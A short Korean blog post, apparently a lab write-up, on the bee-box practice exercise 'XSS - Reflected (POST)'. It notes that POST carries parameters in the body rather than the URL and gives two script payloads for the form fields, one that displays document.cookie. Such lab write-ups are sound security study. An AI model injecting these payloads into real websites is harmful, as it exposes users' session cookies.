Web hacking/bee-box

[Bee-box] XSS - Reflected (POST)

Dokker 2023. 12. 19. 18:04

난이도 하

 

XSS - Reflected ( POST) 는 GET과는 다르게 URL에 파라미터로 전달하지 않고 본문에 포함하는 POST 방식으로 전달하고 있다.

 

 

First name:

<script>alert(document.cookie)</script>

Last name:

<script>alert("warning")</script>

 

 

 

 

POST 방식은 단지 GET방식이냐 POST 방식이냐 차이일뿐 스크립트는 같은 결과가 출력된다.